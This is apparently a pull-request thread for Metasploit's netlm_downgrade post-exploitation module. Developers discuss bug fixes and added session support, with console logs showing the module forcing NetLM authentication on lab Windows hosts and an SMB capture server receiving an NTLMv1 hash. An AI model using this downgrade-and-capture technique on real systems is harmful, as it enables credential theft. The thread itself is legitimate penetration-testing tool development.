netlm_downgrade: Cleanup and support non-Meterpreter sessions

[bcoles]

Resolves Rubocop violations.

Adds documentation.

Adds Notes module meta information.

Fixes multiple bugs:

• platform was not defined, causing an error: [!] SESSION may not be compatible with this module. Clearly a lie.
• If the LmCompatibilityLevel registry value did not exist (default on modern Windows systems) the module would fail with an error: [-] Issues enumerating registry values. This is not a failure condition. Creating the key creates the desired behaviour.
• The module used the Windows::WindowsServices mixin which has been deprecated and also isn't required. Removed.

Adds support for shell and powershell sessions. Sadly, the module dies half way through (immediately after the cmd_exec call) on PowerShell sessions. Not only does this break the remainder of module execution, it also breaks the sessions. I'm fairly certain this is a bug with handling of cmd_exec for PowerShell sessions.

---

Before

msf6 post(windows/gather/netlm_downgrade) > rexploit
[*] Reloading module...

[-] The Windows::WindowsServices mixin is deprecated, use Windows::Services instead
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[-] Issues enumerating registry values
[*] Post module execution completed

After

msf6 post(windows/gather/netlm_downgrade) > rexploit 
[*] Reloading module...

[*] Running module against WIN-7V3NGVNQTJ1 (192.168.200.215)
[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
[+] NetLM authentication is enabled
[*] Establishing SMB connection to 192.168.200.130
[+] SMB server 192.168.200.130 should now have NetLM hashes
[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
[*] Post module execution completed

---

[adfoster-r7]

I'm fairly certain this is a bug with handling of cmd_exec for PowerShell sessions.

This might be fixed by #17072 - I haven't tested though.

[bcoles]

I'm fairly certain this is a bug with handling of cmd_exec for PowerShell sessions.

This might be fixed by #17072 - I haven't tested though.

Nope.

msf6 post(windows/gather/netlm_downgrade) > rexploit 
[*] Reloading module...

[*] Running module against test (192.168.200.190)
[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
[+] NetLM authentication is enabled
[*] Establishing SMB connection to 192.168.200.130
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv1-SSP Client     : 192.168.200.190
[SMB] NTLMv1-SSP Username   : TEST\user
[SMB] NTLMv1-SSP Hash       : user::TEST:a27e689ddbcf86e500000000000000000000000000000000:34592cf2438e1ac29452b1db417e4c8d094f67258dedfe72:bac819dc90f9f159

[+] SMB server 192.168.200.130 should now have NetLM hashes
[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
[-] Could not restore original LM compatibility level # <-- session is toast
[*] Post module execution completed
msf6 post(windows/gather/netlm_downgrade) > rexploit
[*] Reloading module...

[*] Running module against  (192.168.200.190)   # <-- Note the `hostname` command returned no results this time. The session is toast.
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf6 post(windows/gather/netlm_downgrade) > 

[bwatters-r7]

I'm not seeing the crash on Windows 10x64 v1803? Might I ask what OS you were using?

msf6 post(windows/gather/netlm_downgrade) > [*] Powershell session session 4 opened (10.5.135.101:5678 -> 10.5.134.168:50858) at 2022-10-03 16:55:00 -0500

msf6 post(windows/gather/netlm_downgrade) > set session 4
session => 4
msf6 post(windows/gather/netlm_downgrade) > run

[*] Running module against DESKTOP-D1E425Q (10.5.134.168)
[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
[+] NetLM authentication is enabled
[*] Establishing SMB connection to 10.5.134.168
[+] SMB server 10.5.134.168 should now have NetLM hashes
[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
[*] Post module execution completed
msf6 post(windows/gather/netlm_downgrade) > sessions -i 4
[*] Starting interaction with 4...

PS C:\Users\msfuser\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::5828:454b:7874:f3a5%13
   IPv4 Address. . . . . . . . . . . : 10.5.134.168
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.134.1
PS C:\Users\msfuser\Desktop> 

[bcoles]

I'm not seeing the crash on Windows 10x64 v1803? Might I ask what OS you were using?

Windows 7, Windows 2016. Maybe Windows 11 also.

[bwatters-r7]

Release notes

This PR updates the netlm_downgrade module, providing documentation, extending it to support more session types, and fixing some bugs that were present which caused false-positive warnings to appear.